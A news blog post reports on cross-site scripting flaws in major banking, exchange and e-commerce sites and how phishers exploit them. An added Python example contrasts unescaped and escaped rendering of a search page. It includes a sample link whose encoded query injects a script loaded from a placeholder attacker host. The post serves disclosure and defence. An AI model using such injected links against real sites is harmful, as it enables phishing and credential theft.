Flaws in Financial Sites Aid Scammers
Most major U.S. financial institutions have made a noticeable effort over the past year to educate customers about the dangers of online "phishing" scams that use e-mail lures to trick people into giving away their personal data at fake bank Web sites. But according to research commissioned by Security Fix, many of these same institutions still don't do enough on their end to prevent scammers from exploiting programming flaws in their sites to steal customer credentials or otherwise swindle consumers.
Over the past two weeks, I worked with Lance James, chief technology officer for Secure Science Corp. and an expert on phishing attacks, to find and report a large number of such flaws in high-profile banking and e-commerce Web sites. The sites we looked at all were vulnerable to what are known as "cross-site scripting" (XSS) attacks, which occur when Web sites accept input from the user -- usually from something like a search box or e-mail form -- but do not properly filter that input to strip out or disallow potentially malicious code.
Phishers and online scammers exploit these types of flaws to make their scams appear more legitimate, because XSS vulnerabilities allow the attacker to force the target site to load content from somewhere else. A typical XSS attack usually goes like this: The bad guys send out e-mails designed to look like they were sent by the recipient's bank. The e-mails instruct recipients to click on a link and update their account information. Instead of directing them to a purely fraudulent site -- i.e., the hacker's own copy of a real login form -- the link puts the visitor on the bank's actual Web site, thereby giving it a legitimate URL. The page, however, has been manipulated to display content controlled by the attacker.
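The flaw the post keeps running into is a search page that echoes the query back into its own HTML without encoding it. The following added example (my code, not from the post or from any of the sites it names) shows a minimal results page rendered the vulnerable way and the fixed way, and pulls the search term out of a constructed link of the kind a phishing e-mail would carry; `bank.example` and `attacker.invalid` are placeholder hosts, not real sites.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed template for a site-search results page that reflects the query.
TEMPLATE = "<html><body><h1>Results for: {query}</h1><p>No results.</p></body></html>"


def render_results_vulnerable(query: str) -> str:
    """Reflects the search term into the page with no output encoding.
    Whatever the link carries in the 'q' parameter becomes part of the site's
    own page, served from the site's own (possibly SSL-protected) URL."""
    return TEMPLATE.format(query=query)


def render_results_hardened(query: str) -> str:
    """Same page, but the term is HTML-escaped first, so '<', '>', quotes and
    '&' are shown as text instead of being parsed as markup."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


def query_from_url(url: str) -> str:
    """Extract and percent-decode the 'q' parameter the way a search handler would."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def contains_markup(rendered: str, tag: str) -> bool:
    """True if the rendered page contains a live (unescaped) tag of that name."""
    return f"<{tag}" in rendered.lower()


# Constructed sample link: the real site's host, but markup in the search term that
# would make the bank's page pull a script from elsewhere (placeholder hosts only).
SAMPLE_LINK = (
    "https://bank.example/search?q="
    "%3Cscript%20src%3D%22https%3A%2F%2Fattacker.invalid%2Fform.js%22%3E%3C%2Fscript%3E"
)

if __name__ == "__main__":
    q = query_from_url(SAMPLE_LINK)
    print("vulnerable:", render_results_vulnerable(q))
    print("hardened:  ", render_results_hardened(q))
```

Note that the fix lives in the output encoding, not in the transport: the hardened page is identical for an ordinary query, and TLS on the page would not have changed what the vulnerable version rendered.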
One XSS that James found recently at Visa.com uses a flaw in Visa's site-search function to load a sample login page from an external site. (That is just a gross example; James could just as easily have copied the HTML code from Visa's own login page, changed it so that the data went to him, and inserted the altered code from his site.)
Within a few minutes of searching, James found an identical flaw at the Web site of JPMorganChase.com. Notice that the name in the browser address bar shows that the visitor is indeed on Chase's site. Again, the content could have been anything: a login page, a request for the user's bank account number and mother's maiden name, or a script that redirects the user to any other Web site.
Banks and e-commerce sites are not the only ones vulnerable to XSS exploitation. Even information-only sites -- those that hold no real financial or personal information about consumers -- can be leveraged to trick people. I have received quite an increase in penny-stock spam lately, the kind that fraudsters use in pump-and-dump scams to drive up the price of extremely cheap stocks through false and misleading statements.
Imagine how much more successful one of these spam runs could be if curious investors were shown such bogus statements displayed on the Web sites of the American Stock Exchange or the New York Stock Exchange? That's precisely what would be possible with the vulnerabilities James found on both Nyse.com and Amex.com.
In each screenshot, you can see that the link we followed loads the real site and then loads video content from a third-party site on top of it -- in this case from a rather humorous and apropos service at Justgotowned.com. Once again, these are merely examples.
A skilled attacker could completely redesign that entire page to show whatever he wanted. (The Amex.com screenshot does not include the address field because that exchange has not yet fixed the flaw. Amex spokeswoman Mary Chung said the company was in the process of doing so, and the folks at Nyse.com corrected their XSS problem Wednesday night.)
We found similar flaws at eBay, Nasdaq.com, BankofAmerica.com, American Express and Barclays, to name just a few others. One interesting XSS vulnerability was found at Microsoft.com, in a rather odd place: the page Microsoft uses to validate whether the copy of Windows you are using is registered and legitimate. Online criminals are constantly spoofing e-mailed security advisories from Microsoft in an attempt to trick people into installing malicious software. With XSS, attackers can put their download links right onto Microsoft's site.
I know what some of you may be thinking: "Wait a second, Brian. Smart consumers would know to look for an "https://" in front of a login page, or examine the site's security certificate to ensure that the site is in fact the bank they think it is and that it's using secure sockets layer (SSL) technology to safeguard the transmission of login data."
Maybe so (and they'd be smarter not to click on links that arrive in e-mail, period). But last week, Web site monitoring and security firm Netcraft posted a fascinating writeup on a scam e-mail that used an XSS flaw at Paypal to present visitors with a fraudulent login page on the company's legitimate SSL-protected site -- https://www.paypal.com.
Rich Miller, an analyst with Netcraft, said he is constantly surprised that these sorts of flaws exist because the banking industry always talks about how hard it is working to defeat phishing attacks. "Customer awareness is good," Miller said, "but the flip side of that is you have to work just as hard to secure your own Web site."
If there is a silver lining in all of this XSS madness, it's that for the most part, phishers have been content to try to scam online banking customers by directing them via e-mail to wholesale counterfeit sites, said Dan Hubbard, senior director of security and technology research for Websense, an anti-phishing and e-mail security company.
"We've seen several attacks in the wild that utilize [cross-site scripting flaws] on banking sites, and it's definitely a big future threat," Hubbard said. "However, right now there is just so much low-hanging fruit for these guys that it's kind of not needed."
It's worth noting that as I tested some of these XSS flaws at various sites, Netcraft's anti-phishing toolbar -- which I have installed on the version of Firefox I have on one of my home PCs -- actually alerted me whenever I clicked on the links, noting that the technique is commonly used in phishing attacks.
Update, 12:24 p.m. ET: I've heard from a few people who were concerned that I was pointing out links to live exploits in the pictures in this blog post. Rest assured that in any of the pictures above, I have only included a view of the address bar in cases where the featured institution had already fixed the problem.